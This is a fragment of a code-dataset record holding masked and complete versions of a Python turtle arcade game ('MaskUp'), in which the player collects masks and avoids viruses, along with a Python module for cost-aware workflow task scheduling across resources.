wn.title('MaskUp')\n wn.bgcolor('green')\n wn.bgpic('retro_city_title_page.gif')\n wn.setup(width=800, height=600)\n wn.tracer(0)\nwn.mainloop()\n",
"step-4": "import turtle\nimport random\nimport winsound\nimport sys\n<mask token>\nwn = turtle.Screen()\nwn.title('MaskUp')\nwn.bgcolor('green')\nwn.bgpic('retro_city_title_page.gif')\nwn.setup(width=800, height=600)\nwn.tracer(0)\nwn.register_shape('human.gif')\n\n\ndef game_loop():\n score = 0\n lives = 3\n wn.register_shape('human.gif')\n wn.register_shape('Evil-Virus.gif')\n wn.register_shape('surgical-mask.gif')\n player = turtle.Turtle()\n player.speed(0)\n player.shape('human.gif')\n player.color('white')\n player.penup()\n player.goto(0, -250)\n player.direction = 'stop'\n good_guys = []\n for _ in range(3):\n good_guy = turtle.Turtle()\n good_guy.speed(0)\n good_guy.shape('surgical-mask.gif')\n good_guy.color('blue')\n good_guy.penup()\n good_guy.goto(-100, 250)\n good_guy.speed = random.uniform(0.3, 2.0)\n good_guys.append(good_guy)\n bad_guys = []\n for _ in range(5):\n bad_guy = turtle.Turtle()\n bad_guy.speed(0)\n bad_guy.shape('Evil-Virus.gif')\n bad_guy.color('red')\n bad_guy.penup()\n bad_guy.goto(100, 250)\n bad_guy.speed = random.uniform(0.3, 1.0)\n bad_guys.append(bad_guy)\n pen = turtle.Turtle()\n pen.hideturtle()\n pen.speed(0)\n pen.shape('square')\n pen.color('white')\n pen.penup()\n pen.goto(0, 260)\n font = 'Courier', 24, 'normal'\n pen.write('Score: {} Lives: {}'.format(score, lives), align='center',\n font=font)\n\n def show_message(score):\n message = turtle.Turtle()\n message.hideturtle()\n message.speed(0)\n message.color('yellow')\n message.penup()\n message.goto(0, 0)\n font = 'Calibri', 24, 'bold'\n message.write(\n 'GAME OVER: TOO MUCH EXPOSURE TO VIRUS\\n Score: {}\\n!MASK UP and STAY SAFE!'\n .format(score), align='center', font=font)\n\n def go_left():\n player.direction = 'left'\n\n def go_right():\n player.direction = 'right'\n\n def stop_player():\n player.direction = 'stop'\n wn.listen()\n wn.onkeypress(go_left, 'Left')\n wn.onkeyrelease(stop_player, 'Left')\n wn.onkeypress(go_right, 'Right')\n wn.onkeyrelease(stop_player, 'Right')\n while True:\n wn.update()\n if player.direction == 'left':\n x = player.xcor()\n if x > -365:\n x -= 0.8\n player.setx(x)\n if player.direction == 'right':\n x = player.xcor()\n if x < 365:\n x += 0.8\n player.setx(x)\n for good_guy in good_guys:\n y = good_guy.ycor()\n y -= good_guy.speed\n good_guy.sety(y)\n if y < -300:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n good_guy.goto(x, y)\n if good_guy.distance(player) < 40:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n good_guy.goto(x, y)\n score += 10\n pen.clear()\n pen.write('Score: {} Lives: {}'.format(score, lives), align\n ='center', font=font)\n winsound.PlaySound('video_game_retro_8bit_coin', winsound.\n SND_FILENAME)\n for bad_guy in bad_guys:\n y = bad_guy.ycor()\n y -= bad_guy.speed\n bad_guy.sety(y)\n if y < -300:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n bad_guy.goto(x, y)\n if bad_guy.distance(player) < 40:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n bad_guy.goto(x, y)\n score -= 10\n lives -= 1\n pen.clear()\n pen.write('Score: {} Lives: {}'.format(score, lives), align\n ='center', font=font)\n winsound.PlaySound('arcade_game_alarm_short', winsound.\n SND_FILENAME)\n if lives <= 0:\n pen.clear()\n bad_guy.clear()\n good_guy.clear()\n show_message(score)\n winsound.PlaySound('game_over_sound', winsound.SND_FILENAME)\n break\n\n\nwhile True:\n wn.update()\n wn.bgpic('retro_city.gif')\n winsound.PlaySound('retro_video_game_music-trimmed', winsound.SND_LOOP)\n game_loop()\n 
turtle.Screen().clear()\n wn = turtle.Screen()\n wn.title('MaskUp')\n wn.bgcolor('green')\n wn.bgpic('retro_city_title_page.gif')\n wn.setup(width=800, height=600)\n wn.tracer(0)\nwn.mainloop()\n",
"step-5": "\r\nimport turtle\r\nimport random\r\nimport winsound\r\nimport sys\r\n\r\n\r\n\r\n\"\"\" new_game = False\r\n\r\ndef toggle_new_game():\r\n global new_game\r\n if new_game == False:\r\n new_game = True\r\n else:\r\n new_game = False \"\"\"\r\n\r\nwn = turtle.Screen()\r\nwn.title(\"MaskUp\")\r\nwn.bgcolor(\"green\")\r\nwn.bgpic(\"retro_city_title_page.gif\")\r\nwn.setup(width=800, height=600)\r\nwn.tracer(0)\r\nwn.register_shape(\"human.gif\")\r\n\r\n\r\ndef game_loop():\r\n score = 0\r\n lives = 3\r\n\r\n wn.register_shape(\"human.gif\")\r\n wn.register_shape(\"Evil-Virus.gif\")\r\n wn.register_shape(\"surgical-mask.gif\")\r\n\r\n # Add the player\r\n player = turtle.Turtle()\r\n player.speed(0)\r\n player.shape(\"human.gif\")\r\n player.color(\"white\")\r\n player.penup()\r\n player.goto(0, -250)\r\n player.direction = \"stop\"\r\n\r\n\r\n # Create a list of good guys\r\n good_guys = []\r\n\r\n # Add the good_guys\r\n for _ in range(3):\r\n good_guy = turtle.Turtle()\r\n good_guy.speed(0)\r\n good_guy.shape(\"surgical-mask.gif\")\r\n good_guy.color(\"blue\")\r\n good_guy.penup()\r\n good_guy.goto(-100, 250)\r\n good_guy.speed = random.uniform(0.3, 2.0)\r\n good_guys.append(good_guy)\r\n\r\n # Create a list of bad guys\r\n bad_guys = []\r\n\r\n # Add the bad_guys\r\n for _ in range(5):\r\n bad_guy = turtle.Turtle()\r\n bad_guy.speed(0)\r\n bad_guy.shape(\"Evil-Virus.gif\")\r\n bad_guy.color(\"red\")\r\n bad_guy.penup()\r\n bad_guy.goto(100, 250)\r\n bad_guy.speed = random.uniform(0.3, 1.0)\r\n bad_guys.append(bad_guy)\r\n\r\n \r\n # Make the pen\r\n pen = turtle.Turtle()\r\n pen.hideturtle()\r\n pen.speed(0)\r\n pen.shape(\"square\")\r\n pen.color(\"white\")\r\n pen.penup()\r\n pen.goto(0, 260)\r\n font = (\"Courier\", 24, \"normal\")\r\n pen.write(\"Score: {} Lives: {}\".format(score, lives), align=\"center\", font=font)\r\n\r\n # Make the message\r\n def show_message(score):\r\n message = turtle.Turtle()\r\n message.hideturtle()\r\n message.speed(0)\r\n message.color(\"yellow\")\r\n message.penup()\r\n message.goto(0, 0)\r\n font = (\"Calibri\", 24, \"bold\")\r\n message.write(\"GAME OVER: TOO MUCH EXPOSURE TO VIRUS\\n Score: {}\\n!MASK UP and STAY SAFE!\".format(score), align=\"center\", font=font) \r\n\r\n # Functions\r\n def go_left():\r\n player.direction = \"left\"\r\n\r\n def go_right():\r\n player.direction = \"right\"\r\n\r\n def stop_player():\r\n player.direction = \"stop\"\r\n\r\n # Keyboard Binding\r\n wn.listen()\r\n wn.onkeypress(go_left, \"Left\")\r\n wn.onkeyrelease(stop_player, \"Left\")\r\n wn.onkeypress(go_right, \"Right\")\r\n wn.onkeyrelease(stop_player, \"Right\")\r\n\r\n\r\n \r\n while True:\r\n # Update screen\r\n wn.update()\r\n\r\n # Move the player\r\n if player.direction == \"left\":\r\n x = player.xcor()\r\n if x > -365:\r\n x -= 0.8\r\n player.setx(x)\r\n \r\n if player.direction == \"right\":\r\n x = player.xcor()\r\n if x < 365:\r\n x += 0.8\r\n player.setx(x)\r\n\r\n # Move the good guys\r\n for good_guy in good_guys:\r\n y = good_guy.ycor()\r\n y -= good_guy.speed\r\n good_guy.sety(y)\r\n\r\n # Check if off the screen\r\n if y < -300:\r\n x = random.randint(-380, 380)\r\n y = random.randint(300, 400)\r\n good_guy.goto(x, y)\r\n\r\n # Check for a collision with player\r\n if good_guy.distance(player) < 40:\r\n x = random.randint(-380, 380)\r\n y = random.randint(300, 400)\r\n good_guy.goto(x, y)\r\n score += 10\r\n pen.clear()\r\n pen.write(\"Score: {} Lives: {}\".format(score, lives), align=\"center\", font=font)\r\n 
winsound.PlaySound(\"video_game_retro_8bit_coin\", winsound.SND_FILENAME)\r\n \r\n # Move the bad guys\r\n for bad_guy in bad_guys:\r\n y = bad_guy.ycor()\r\n y -= bad_guy.speed\r\n bad_guy.sety(y)\r\n\r\n # Check if off the screen\r\n if y < -300:\r\n x = random.randint(-380, 380)\r\n y = random.randint(300, 400)\r\n bad_guy.goto(x, y)\r\n\r\n # Check for a collision with player\r\n if bad_guy.distance(player) < 40:\r\n x = random.randint(-380, 380)\r\n y = random.randint(300, 400)\r\n bad_guy.goto(x, y)\r\n score -= 10\r\n lives -= 1\r\n pen.clear()\r\n pen.write(\"Score: {} Lives: {}\".format(score, lives), align=\"center\", font=font)\r\n winsound.PlaySound(\"arcade_game_alarm_short\", winsound.SND_FILENAME)\r\n\r\n if lives <= 0:\r\n pen.clear()\r\n bad_guy.clear()\r\n good_guy.clear()\r\n show_message(score)\r\n winsound.PlaySound(\"game_over_sound\", winsound.SND_FILENAME)\r\n # wn.listen()\r\n # if wn.onkeypress(toggle_new_game, \"a\"):\r\n # if new_game == True:\r\n break\r\n # wn.onkeypress(sys.exit(), \"q\")\r\n\r\nwhile True:\r\n # Update screen\r\n wn.update()\r\n\r\n # Play music\r\n wn.bgpic(\"retro_city.gif\")\r\n winsound.PlaySound(\"retro_video_game_music-trimmed\", winsound.SND_LOOP)\r\n game_loop()\r\n turtle.Screen().clear()\r\n \r\n wn = turtle.Screen()\r\n wn.title(\"MaskUp\")\r\n wn.bgcolor(\"green\")\r\n wn.bgpic(\"retro_city_title_page.gif\")\r\n wn.setup(width=800, height=600)\r\n wn.tracer(0)\r\n\r\n #sys.exit()\r\n \r\n \r\n \r\n \r\n\r\n\r\nwn.mainloop()",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
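A minimal sketch of the catch-and-respawn pattern the MaskUp record above applies to both sprite lists (the helper names are hypothetical; the 40-pixel radius and the respawn window come from the game):

import random

def respawn(sprite):
    # send a caught sprite back above the visible screen
    sprite.goto(random.randint(-380, 380), random.randint(300, 400))

def handle_catch(player, sprite, score, delta):
    # a hit is any falling sprite within 40 pixels of the player
    if sprite.distance(player) < 40:
        respawn(sprite)
        score += delta  # +10 for a mask, -10 for a virus in the original
    return score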
from __future__ import print_function
import math
import db
from db import writer
from enum import Enum
from Definitions.Graph import Task
class Constraint(Enum):
deadline = 1
budget = 2
none = 3
def f_range(x, y, jump):
while x < y:
yield x
x += jump
class TaskSchedule:
def __init__(self, task, est=-1, runtime=-1, eft=-1, resource=-1):
self.task = task
self.EFT = eft
self.EST = est
self.runtime = runtime
self.resource = resource
class Resources(object):
len = -1
bandwidth = 0
def __init__(self, powers, bandwidth): # e.g. [1,1,2,2,4]
number_of_resources = len(powers)
self.power = powers
self.tasksOfResource = [] # ordered set of TaskSchedule objects in every resource
for i in range(number_of_resources):
self.tasksOfResource.append([])
self.len = number_of_resources
self.bandwidth = bandwidth
self.job_task_schedule = {} # job_task_schedule['Mine_10_1'][4].EFT == 12
def find_gap(self, resource, start_time, runtime):
        '''
        Finds a gap on the given resource and returns the start time together with the index at
        which the task should be placed among the resource's current tasks.
        If resource is -1, it does nothing (returns the given start time, and -1 for the place).
        '''
if resource == -1:
return start_time, -1
number_of_tasks = len(self.tasksOfResource[resource])
if number_of_tasks == 0:
return start_time, 0
elif self.tasksOfResource[resource][0].EST >= start_time + runtime:
return start_time, 0
elif number_of_tasks == 1:
if self.tasksOfResource[resource][0].EFT < start_time:
return start_time, 1
else:
return self.tasksOfResource[resource][0].EFT, 1
else:
for i in range(1, number_of_tasks):
if self.tasksOfResource[resource][i].EST <= start_time:
continue
elif start_time < self.tasksOfResource[resource][i - 1].EFT:
gap = self.tasksOfResource[resource][i].EST - self.tasksOfResource[resource][i - 1].EFT
if gap < runtime:
continue
else:
return self.tasksOfResource[resource][i - 1].EFT, i
elif self.tasksOfResource[resource][i - 1].EFT <= start_time < self.tasksOfResource[resource][i].EST:
if self.tasksOfResource[resource][i].EST - start_time < runtime:
continue
else:
return start_time, i
else: # no gap is found, put it at the end (it can be done using append method)
return max(self.tasksOfResource[resource][-1].EFT, start_time), -1
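    # Worked example (illustrative, not from the original source): with tasks
    # occupying [0, 4] and [10, 14], find_gap(r, 2, 3) returns (4, 1): the
    # 3-unit task fits the [4, 10] idle window, starting right after the first
    # task, at place index 1.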
def calculate_eft(self, task, resource_id, arrival_time=0):
g = task.graph
if resource_id == -1:
graphs_task_on_resource = []
task_runtime_on_resource = task.weight / max(self.power)
else:
task_runtime_on_resource = task.weight / self.power[resource_id]
graphs_task_on_resource = list(
map(lambda t: t.task.id if t.task.graph.name == g.name else -1, self.tasksOfResource[resource_id]))
max_est_of_task = arrival_time
for p in task.predecessor:
            # check whether predecessor p ran on the same resource (then the transfer is free)
if p in graphs_task_on_resource:
communication_delay = 0
else:
communication_delay = task.predecessor[p] / self.bandwidth
if g.name not in self.job_task_schedule or p not in self.job_task_schedule[g.name]:
continue
p_eft = self.job_task_schedule[g.name][p].EFT
if p_eft + communication_delay > max_est_of_task:
max_est_of_task = p_eft + communication_delay
# EST Of Task is found and stored in max_est_of_task
# Find a gap to schedule it:
start_time, place_id = self.find_gap(resource_id, max_est_of_task, task_runtime_on_resource)
eft_task = start_time + task_runtime_on_resource
return start_time, eft_task, task_runtime_on_resource, place_id
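    # Worked example (illustrative, not from the original source): if a
    # predecessor finished at t=10 and its edge carries 20 units of data over
    # bandwidth 10, the EST on any other resource is at least 10 + 20/10 = 12;
    # on the predecessor's own resource the transfer is free, so at least 10.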
def schedule(self, task_schedule, place_id=-1):
"""
Schedules a task in a place id. if place_id is -1 the schedule is appended to the last.
:type task_schedule: TaskSchedule
:type place_id: int
"""
resource = task_schedule.resource
if place_id == -1:
self.tasksOfResource[resource].append(task_schedule)
else:
self.tasksOfResource[resource].insert(place_id, task_schedule)
        if task_schedule.task.graph.name not in self.job_task_schedule:
            self.job_task_schedule[task_schedule.task.graph.name] = {}
self.job_task_schedule[task_schedule.task.graph.name][task_schedule.task.id] = task_schedule
def show_schedule(self, job_id=-1, finishing=None, print_enabled=False):
result = []
for r in range(0, self.len):
names = []
est = []
eft = []
def add_entries(x):
if job_id != -1 and x.task.graph.name != job_id:
return
names.append(x.task.id if job_id != -1 else f'{x.task.graph.name}-{x.task.id}')
est.append(x.EST)
eft.append(x.EFT)
list(map(add_entries, self.tasksOfResource[r]))
result.append((names, est, eft))
def print_list(x):
if not print_enabled:
return
first = True
for e in x:
if first:
first = False
else:
print(',', end=' ')
print(e, end=' ')
print()
print_list(names)
print_list(est)
print_list(eft)
if finishing is not None and print_enabled:
print(finishing)
return result
def write_schedule(self, db_file, test_name='N/A', extra='single', policy='', job_count=1):
w = writer.Writer(db_file)
w.create_plan()
w.create_plan_head()
unique_jobs_id = w.write_plan_head(test_name, policy, job_count)
def add_entries(x):
            job_name, job_type, task_id, jobs_id = x.task.graph.name, x.task.graph.type, x.task.id, unique_jobs_id
            start_time, finish_time, resource_id, resource_speed = x.EST, x.EFT, r, self.power[r]
            job_component_id, extra_params = policy, extra
            w.write_plan(job_name, job_type, task_id, jobs_id, start_time, finish_time, resource_id,
                         resource_speed, job_component_id, extra_params)
for r in range(0, self.len):
list(map(add_entries, self.tasksOfResource[r]))
w.commit()
w.close()
@property
def average_power(self):
return math.fsum(self.power) / self.len
@property
def makespan(self):
eft = 0
for i in range(0, self.len):
tasks_in_resource = self.tasksOfResource[i]
if len(tasks_in_resource) == 0:
continue
eft = max(eft, tasks_in_resource[-1].EFT)
return eft
def sum_gaps_resource(self, resource_id):
tasks_in_current_resource = self.tasksOfResource[resource_id]
num_tasks = len(tasks_in_current_resource)
if num_tasks <= 1:
return 0
sum_gaps = 0
for i in range(1, num_tasks):
if tasks_in_current_resource[i - 1].task.dummy_task or tasks_in_current_resource[i].task.dummy_task:
continue
finish_prev = tasks_in_current_resource[i - 1].EFT
start_current = tasks_in_current_resource[i].EST
gap_length = start_current - finish_prev
if gap_length < 0:
raise Exception('Schedule is not correct, check gaps!')
sum_gaps += gap_length
return sum_gaps
@property
def sum_internal_gaps(self):
sum_gaps = 0
for r in range(0, self.len):
sum_gaps += self.sum_gaps_resource(r)
return sum_gaps
def select_resource(self, task, arrival_time=0):
est_best, eft_best, runtime_on_resource_best, place_id_best, resource_id_best = -1, -1, -1, -1, -1
for r in range(0, self.len):
max_est_of_task, eft_task, task_runtime_on_resource, place_id = self.calculate_eft(task, r, arrival_time=arrival_time)
if eft_best == -1 or eft_task < eft_best:
est_best, eft_best, runtime_on_resource_best, place_id_best, resource_id_best = \
max_est_of_task, eft_task, task_runtime_on_resource, place_id, r
return est_best, runtime_on_resource_best, eft_best, resource_id_best, place_id_best
def get_fastest_empty_resource(self):
for r in range(self.len - 1, -1, -1):
if len(self.tasksOfResource[r]) == 0:
return r
else:
return -1
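    # Note: the for/else above is Python's loop-else; the else branch runs only
    # when the loop completes without returning, i.e. no resource is empty.
    # get_cheapest_empty_resource in the subclass uses the same idiom.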
class CostAwareResources(Resources):
def __init__(self, powers, prices, timeslot_len, bandwidth):
super(CostAwareResources, self).__init__(powers, bandwidth)
self.timeslot = timeslot_len
self.price = prices
self.head_nodes = {}
self.sum_weight_scheduled = {}
def resource_cost(self, resource_id, start_time=-1, eft=-1, cost_only=True):
"""
computes a resource's cost. if cost_only==True, only returns cost, otherwise it returns also start and finish-times.
:param resource_id:
:param start_time:
:param eft:
:param cost_only:
:return:
"""
tasks_in_resource = [t for t in self.tasksOfResource[resource_id] if not t.task.dummy_task]
if not tasks_in_resource:
if eft == -1:
return 0 if cost_only else (0, 0, 0)
else:
return math.ceil((eft - start_time) / self.timeslot[resource_id]) * self.price[resource_id]
timeslot = self.timeslot[resource_id]
startof = [x.EST for x in tasks_in_resource]
endof = [x.EFT for x in tasks_in_resource]
if start_time != -1:
startof.append(start_time)
endof.append(eft)
startof.sort()
endof.sort()
timeslot_start = min(startof)
last_finish_time = max(endof)
current_task_id = 0
rent_periods = []
while timeslot_start < last_finish_time:
task_len = endof[current_task_id] - timeslot_start
time_slot_finish = endof[current_task_id] + (timeslot - (task_len % timeslot)) % timeslot
current_task_id += 1
if current_task_id >= len(startof):
rent_periods.append((timeslot_start, time_slot_finish))
break
if startof[current_task_id] <= time_slot_finish:
pass
else:
rent_periods.append((timeslot_start, time_slot_finish))
timeslot_start = startof[current_task_id]
sum = 0
for rp in rent_periods:
sum += (rp[1] - rp[0])
cost = sum / timeslot * self.price[resource_id]
if cost_only:
return cost
else:
return cost, min(startof), (max(endof))
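    # Worked example (illustrative, not from the original source): with a
    # 10-unit timeslot, one busy span from t=3 to t=17 (14 units) is padded to
    # the next slot boundary, giving the single rent period (3, 23) and a
    # charge of two full timeslots.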
def resource_start_time(self, resource_id):
tasks_in_resource = self.tasksOfResource[resource_id]
length = len(tasks_in_resource)
start_index = 0
while length > 0 and tasks_in_resource[start_index].task.dummy_task:
start_index += 1
length -= 1
if length == 0:
return -1
return tasks_in_resource[start_index].EST
@property
def plan_cost(self):
cost = 0
for i in range(0, self.len):
cost += self.resource_cost(i)
return cost
def calculate_shared_cost_within_timeslot(self, timeslot_start, est, ft, resource_id, task_id=None):
timeslot_end = timeslot_start + self.timeslot[resource_id]
if ft <= timeslot_start or est >= timeslot_end:
return 0
tasks = self.tasksOfResource[resource_id]
task_ids = self.task_id_in_timeslot(resource_id, timeslot_start)
sum_w = 0
for id in task_ids:
if task_id == id:
continue
start_time = tasks[id].EST
finish_time = tasks[id].EFT
if start_time < timeslot_start:
start_time = timeslot_start
if finish_time > timeslot_end:
finish_time = timeslot_end
sum_w += finish_time - start_time
if est < timeslot_start:
est = timeslot_start
if ft > timeslot_end:
ft = timeslot_end
if ft == est:
return 0
share = float(ft - est) / (sum_w + ft - est)
return share * self.price[resource_id]
def task_id_in_timeslot(self, resource_id, timeslot_start):
timeslot_end = timeslot_start + self.timeslot[resource_id]
task_ids = []
for id in range(len(self.tasksOfResource[resource_id])):
s = self.tasksOfResource[resource_id][id]
if timeslot_start <= s.EST <= timeslot_end or timeslot_start <= s.EFT <= timeslot_end \
or s.EST < timeslot_start and timeslot_end < s.EFT:
task_ids.append(id)
return task_ids
def calculate_task_shared_cost(self, est=-1, ft=-1, resource_id=-1, task_id=None):
if task_id is not None:
# this task has already been scheduled
est = self.tasksOfResource[resource_id][task_id].EST
ft = self.tasksOfResource[resource_id][task_id].EFT
timeslot_len = self.timeslot[resource_id]
resource_start_time = self.resource_start_time(resource_id)
if resource_start_time == -1:
resource_start_time = est
timeslot_start = float(timeslot_len) * math.floor((est - resource_start_time) /
timeslot_len) + resource_start_time
timeslot_end = float(timeslot_len) * math.ceil((ft - resource_start_time) /
timeslot_len) + resource_start_time
shared_cost = 0
for interval in f_range(timeslot_start, timeslot_end + timeslot_len / 2, timeslot_len):
share_in_interval = self.calculate_shared_cost_within_timeslot(interval, est, ft, resource_id, task_id)
shared_cost += share_in_interval
return shared_cost
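    # Worked example (illustrative, not from the original source): if two jobs
    # are busy for 6 and 2 time units inside one timeslot, its price is split
    # 6/(6+2) = 75% versus 25% between them.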
def calculate_eft_and_cost(self, task, resource_id, arrival_time=0):
"""
calculates eft and cost of a certain task on a certain resource.
:param task:Definitions.Task()
:param resource_id:
:return:
"""
start_time, eft, runtime_on_resource, place_id = self.calculate_eft(task, resource_id, arrival_time=arrival_time)
if task.dummy_task:
return start_time, eft, runtime_on_resource, place_id, 0
else:
cost = self.calculate_share_cost_change(resource_id, start_time, eft, task.graph.name, True)
return start_time, eft, runtime_on_resource, place_id, cost
def sum_external_gaps_resource(self, r):
c, s, e = self.resource_cost(r, cost_only=False)
reservation = e - s
timeslot = self.timeslot[r]
gap = timeslot - reservation % timeslot
if gap == timeslot:
return 0
else:
return gap
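    # Worked example (illustrative, not from the original source): a 14-unit
    # reservation on a 10-unit timeslot leaves an external gap of
    # 10 - (14 % 10) = 6 paid-but-idle units; a 20-unit reservation fills its
    # slots exactly, so the gap is 0.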
@property
def sum_external_gaps(self):
sum_gaps = 0
for r in range(0, self.len):
sum_gaps += self.sum_external_gaps_resource(r)
return sum_gaps
@property
def sum_gaps(self):
return self.sum_internal_gaps + self.sum_external_gaps
@property
def occupied_resources(self):
counter = 0
for i in range(self.len):
if self.resource_cost(i) != 0:
counter += self.price[i]
return counter
@property
def gap_rate(self):
return self.sum_gaps / self.makespan / self.occupied_resources
    def select_resource(self, task=Task(), test=None, arrival_time=0):  # note: the Task() default is created once, at function definition time
eft_best = -1
def something_found():
return eft_best != -1
if task.asap is not None:
if not task.asap: # budget workflow
if not test:
print('', end='')
# fastest affordable
est_best, eft_best, runtime_on_resource_best, place_id_best, resource_id_best, cost_best = \
-1, -1, -1, -1, -1, -1
for r in range(0, self.len):
start_time, eft, runtime_on_resource, place_id, cost = self.calculate_eft_and_cost(task, r, arrival_time=arrival_time)
                    if (not something_found() or
                            eft < eft_best and task.sub_deadline < eft_best or  # current best misses its deadline and this finishes earlier
                            task.sub_budget < cost_best and eft <= task.sub_deadline and cost < cost_best or  # current best over budget; this is on time and cheaper
                            eft <= task.sub_deadline and cost <= task.sub_budget and
                            (eft_best > task.sub_deadline or cost_best > task.sub_budget) or  # this meets both bounds while the best violates one
                            eft <= task.sub_deadline and cost <= task.sub_budget and eft < eft_best or  # both bounds met and an earlier finish
                            eft <= task.sub_deadline and cost <= task.sub_budget and eft == eft_best and cost < cost_best):  # same finish, cheaper
est_best, eft_best, runtime_on_resource_best, place_id_best, resource_id_best, cost_best = \
start_time, eft, runtime_on_resource, place_id, r, cost
continue
if not test:
print('', end='')
return est_best, runtime_on_resource_best, eft_best, resource_id_best, place_id_best, cost_best
elif task.asap: # deadline workflow
# cheapest before sub-deadline
if not test:
print('', end='')
est_best, eft_best, runtime_on_resource_best, place_id_best, resource_id_best, cost_best = \
-1, -1, -1, -1, -1, -1
for r in range(0, self.len):
start_time, eft, runtime_on_resource, place_id, cost = self.calculate_eft_and_cost(task, r, arrival_time=arrival_time)
# if eft_best == -1 or eft_best > eft > task.sub_deadline or task.sub_deadline >= eft and (
# cost < cost_best or eft_best > task.sub_deadline):
                    if (not something_found() or
                            eft < eft_best and task.sub_deadline < eft_best or  # current best misses its deadline and this finishes earlier
                            task.sub_budget < cost_best and eft <= task.sub_deadline and cost < cost_best or  # current best over budget; this is on time and cheaper
                            eft <= task.sub_deadline and cost <= task.sub_budget and
                            (eft_best > task.sub_deadline or cost_best > task.sub_budget) or  # this meets both bounds while the best violates one
                            eft <= task.sub_deadline and cost <= task.sub_budget and cost < cost_best or  # both bounds met and cheaper
                            eft <= task.sub_deadline and cost <= task.sub_budget and cost == cost_best and eft < eft_best):  # same cost, earlier finish
est_best, eft_best, runtime_on_resource_best, place_id_best, resource_id_best, cost_best = \
start_time, eft, runtime_on_resource, place_id, r, cost
# if cost_best == -1 or cost_best > cost > task.sub_budget or task.sub_budget >= cost and (
# eft < eft_best or cost_best > task.sub_budget):
# est_best, eft_best, runtime_on_resource_best, place_id_best, resource_id_best, cost_best = \
# start_time, eft, runtime_on_resource, place_id, r, cost
continue
if not test:
print('', end='')
return est_best, runtime_on_resource_best, eft_best, resource_id_best, place_id_best, cost_best
else:
# minimize time (as in HEFT) TODO: it doesn't return cost (as the sixth return value)
return super(CostAwareResources, self).select_resource(task)
def price_of_each_graph(self):
graph_names = self.job_task_schedule.keys()
costs = {}
for name in graph_names:
costs[name] = 0
for r in range(self.len):
for id in range(len(self.tasksOfResource[r])):
name = self.tasksOfResource[r][id].task.graph.name
cost = self.calculate_task_shared_cost(resource_id=r, task_id=id)
costs[name] += cost
return costs
def get_cheapest_empty_resource(self):
for r in range(self.len):
if len(self.tasksOfResource[r]) == 0:
return r
else:
return -1
def schedule(self, task_schedule, place_id=-1, do_head_nodes=False):
super(CostAwareResources, self).schedule(task_schedule, place_id)
# head_node computations:
if not do_head_nodes:
return
if task_schedule.task.graph.name in self.head_nodes:
parents_of_current_task = task_schedule.task.predecessor.keys()
self.head_nodes[task_schedule.task.graph.name] = self.head_nodes[task_schedule.task.graph.name].difference(
parents_of_current_task)
self.head_nodes[task_schedule.task.graph.name].add(task_schedule.task.id)
else:
self.head_nodes[task_schedule.task.graph.name] = set()
self.head_nodes[task_schedule.task.graph.name].add(task_schedule.task.id)
self.sum_weight_scheduled[task_schedule.task.graph.name] = 0
self.sum_weight_scheduled[task_schedule.task.graph.name] += task_schedule.task.weight
def calculate_share_cost_change(self, resource_id, est=-1, eft=-1, job_id=-1, only_this_job=False):
sum_w = {}
for i in range(len(self.tasksOfResource[resource_id])):
sch = self.tasksOfResource[resource_id][i]
job = sch.task.graph.name
if job not in sum_w:
sum_w[job] = 0
sum_w[job] += sch.EFT - sch.EST
sum_w_all_old = sum(sum_w.values())
prev_cost_resource = self.resource_cost(resource_id)
prev_cost_job = {}
for j in sum_w.keys():
if sum_w_all_old == 0:
prev_cost_job[j] = 0
else:
prev_cost_job[j] = float(prev_cost_resource) * sum_w[j] / sum_w_all_old
if est == -1:
return prev_cost_job
new_cost_resource = self.resource_cost(resource_id, start_time=est, eft=eft)
if job_id not in sum_w:
sum_w[job_id] = 0
sum_w[job_id] += eft - est
sum_w_all_new = sum_w_all_old + eft - est
new_cost_job = {}
changes = {}
for j in sum_w.keys():
if sum_w_all_new == 0:
new_cost_job[j] = 0
else:
new_cost_job[j] = float(new_cost_resource) * sum_w[j] / sum_w_all_new
if j not in prev_cost_job:
changes[j] = new_cost_job[j]
else:
changes[j] = new_cost_job[j] - prev_cost_job[j]
if only_this_job:
return changes[job_id]
return changes
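# Illustrative usage sketch (not part of the original module); the speeds,
# prices and timeslot lengths are made-up values.
if __name__ == '__main__':
    res = CostAwareResources(powers=[1, 2], prices=[1.0, 2.5],
                             timeslot_len=[10, 10], bandwidth=10)
    print(res.average_power)  # (1 + 2) / 2 = 1.5
    print(res.plan_cost)      # 0: nothing has been scheduled yet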
|
normal
|
{
"blob_id": "567076af26b8c93c68647103aeddf43aeb24db13",
"index": 2054,
"step-1": "<mask token>\n\n\nclass Resources(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @property\n def makespan(self):\n eft = 0\n for i in range(0, self.len):\n tasks_in_resource = self.tasksOfResource[i]\n if len(tasks_in_resource) == 0:\n continue\n eft = max(eft, tasks_in_resource[-1].EFT)\n return eft\n <mask token>\n\n @property\n def sum_internal_gaps(self):\n sum_gaps = 0\n for r in range(0, self.len):\n sum_gaps += self.sum_gaps_resource(r)\n return sum_gaps\n <mask token>\n <mask token>\n\n\nclass CostAwareResources(Resources):\n\n def __init__(self, powers, prices, timeslot_len, bandwidth):\n super(CostAwareResources, self).__init__(powers, bandwidth)\n self.timeslot = timeslot_len\n self.price = prices\n self.head_nodes = {}\n self.sum_weight_scheduled = {}\n\n def resource_cost(self, resource_id, start_time=-1, eft=-1, cost_only=True\n ):\n \"\"\"\n computes a resource's cost. if cost_only==True, only returns cost, otherwise it returns also start and finish-times.\n :param resource_id:\n :param start_time:\n :param eft:\n :param cost_only:\n :return:\n \"\"\"\n tasks_in_resource = [t for t in self.tasksOfResource[resource_id] if\n not t.task.dummy_task]\n if not tasks_in_resource:\n if eft == -1:\n return 0 if cost_only else (0, 0, 0)\n else:\n return math.ceil((eft - start_time) / self.timeslot[\n resource_id]) * self.price[resource_id]\n if start_time != -1:\n task_start_time = min(tasks_in_resource[0].EST, start_time)\n else:\n task_start_time = tasks_in_resource[0].EST\n task_finish_time = max(tasks_in_resource[-1].EFT, eft)\n reservation = task_finish_time - task_start_time\n cost = math.ceil(reservation / self.timeslot[resource_id]\n ) * self.price[resource_id]\n timeslot = self.timeslot[resource_id]\n startof = [x.EST for x in tasks_in_resource]\n endof = 